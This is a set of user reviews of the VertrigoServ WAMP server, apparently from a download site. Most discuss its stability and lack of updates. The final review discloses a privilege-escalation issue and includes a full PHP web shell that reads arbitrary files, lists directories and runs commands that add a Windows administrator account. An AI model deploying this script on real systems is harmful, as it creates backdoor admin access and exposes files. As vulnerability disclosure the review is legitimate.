Really solid WAMP server if you're looking for something that supports 64-bit. HOWEVER, you need to be aware that it does not necessarily stay up-to-date. Last activity on it was 2018. Lots of security patches and technology updates with PHP, MySQL (now known as MariaDB) and even Apache since that time! There's also an additional frustrating behavior where the only interface you have to work with the server (which includes simple restarts) will consistently freeze up if you try to work with it while the server is running as a Windows service. Why? I dunno, support is pretty much nonexistent with this thing now. If you want a simpler experience that's up-to-date and don't need the 64-bit aspect, just do yourself a favor and install AMPPS instead. Less hassles, frequent updates, accessible support and actively-communicating userbase. I really wanted to love VertrigoServ. Despite its ugly, dated interface and irritating configuration methods, I was willing to give it every benefit of doubt possible. Sadly, I don't have time to mess with a server that misbehaves whenever I need to make small changes. I need to spend my time working on development of things for the server to run, not waste time trying to figure out why the server isn't behaving as expected.

Vertrigo is very stable W.A.M.P. server. This is the 5th server running on my pc so I have to change port settings which broke other servers, but this one works really well. The control panel is also easy to use and give lots of information. I only hope the developer will add a utility to change server ports easily. Thanks!

I was unable to locate a responsive support option, but I just love the software itself. Here's hoping I don't end up needing support. :) Lol...

I really love this project, two thumbs and five star. Very recommended, easy to use, small and almost complete package! Thanks, keep your nice job! Very nice development, but still waiting for the version with the "Thread Safety" disabled, so that we can run php script was encoded with Zend Guard.

MAJOR SECURITY ISSUE (Privilege Escalation Exploit) - v2.27 POC: 1. Save the script below as "script.php" and put it in your WWW directory 2. Open it in your browser: localhost/script.php?qQx If execution is successful, you'll get this message: "User own -> full privileges successfully added." Now, open Command Prompt (cmd), type "Net User" then press Enter. You'll see a a new user "own" (password "own") Now think of the implications... for example, you use Vertrigo to test nulled scripts or scripts from shady sources and one of those scripts has this nifty piece of code hidden somewhere (plus all the bells and whistles like logging your IP and other details of course)... Well, enough said, I'll still give it a thumbs up because it's my favorite web server application for local testing but this should REALLY be fixed. -------------------------------- <?php error_reporting(E_ALL ^ E_NOTICE); $qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB']; $qQd = opendir($qQa); if (isset($_GET['qrF'])) { $qrX = fopen($_GET['qrF'],"r"); echo fread($qrX,50000); exit; } elseif(isset($_GET['qQx'])) { exec("net user own own /add & net localgroup Administrators own /add"); echo "User own -> full privileges successfully added";exit;} echo "<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>"; echo htmlspecialchars(shell_exec("cd ".$qQa." & dir")); echo "</textarea>"; while (false !== ($qQr = readdir($qQd))){ switch(filetype($qQa.$qQr)) { case "dir": echo "<a href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>"; break; case "file": echo "<a href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>"; break; } } ?>
